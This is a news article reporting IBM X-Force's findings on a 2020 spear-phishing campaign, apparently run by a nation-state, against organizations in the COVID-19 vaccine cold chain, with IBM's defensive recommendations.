A global phishing campaign has targeted organizations associated with a segment of the COVID-19 supply chain in an apparent nation-state effort, IBM researchers found.
IBM’s Security X-Force said the calculated operation started in September 2020 and targeted businesses across six countries associated with the COVID-19 cold chain, which is focused on safely preserving vaccines in temperature-controlled environments during their storage and transportation. The adversary impersonated an executive from Haier Biomedical, the world’s only complete cold chain provider.
“The purpose of this COVID-19 phishing campaign may have been to harvest credentials, possibly to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution,” Claire Zaboeva, senior strategic cyber threat analyst at IBM, wrote in a blog post Thursday.
The targets included the European Commission’s Directorate-General for Taxation and Customs Union, as well as private companies headquartered in Germany, Italy, South Korea, Czech Republic, greater Europe and Taiwan. Firms within the energy, manufacturing, website creation and software and internet security sectors focused on meeting the transportation needs of the COVID-19 cold chain were targeted.
Spear-phishing emails were sent to select executives in sales, procurement, information technology and finance positions who were believed to be involved in company efforts to support the vaccine cold chain. It’s unclear from IBM’s analysis if the COVID-19 phishing campaign was ultimately successful, according to Zaboeva.
The subject of the phishing emails posed as requests for quotations, and the body of the emails contained malicious HTML attachments that opened locally, prompting recipients to enter their credentials to view the file. Utilizing this technique meant that hackers weren’t setting up phishing pages online that could be discovered and taken down by security research teams and law enforcement.
“The adversary could gain insight into internal communications, as well as the process, methods and plans to distribute a COVID-19 vaccine,” Zaboeva wrote in the blog post. “This includes information regarding infrastructure that governments intend to use to distribute a vaccine to the vendors that will be supplying it.”
From a targeting perspective, IBM said going after the Directorate-General could serve as a single point of compromise impacting multiple high-value targets across the 27 member states of the European Union and beyond. Adversaries also targeted a German website development company that supports multiple clients associated with pharmaceutical manufacturers, container transport and biotechnology.
Within the energy sector, IBM said companies involved in manufacturing solar panels were targeted since vaccines can be kept cold in countries without reliable power by using refrigerators powered by solar panels. Companies associated with petrochemicals were also targeted since dry ice – which is a byproduct of petroleum production – is a key component of the cold chain.
The precise targeting and the nature of the organizations that the adversaries went after points to nation-state activity, said IBM, noting that insight into the transport of a vaccine might be a hot commodity on the black market.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets,” Zaboeva wrote. “Advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely a high-value and high-priority nation-state target.”
IBM recommends that firms likely to be targeted as part of the COVID-19 supply chain: create and test their incident response plans; share and ingest threat intelligence; assess their third-party ecosystem; apply a zero-trust approach to their security strategy; use multi-factor authentication across their organization; conduct email security educational trainings; and use endpoint protection and response.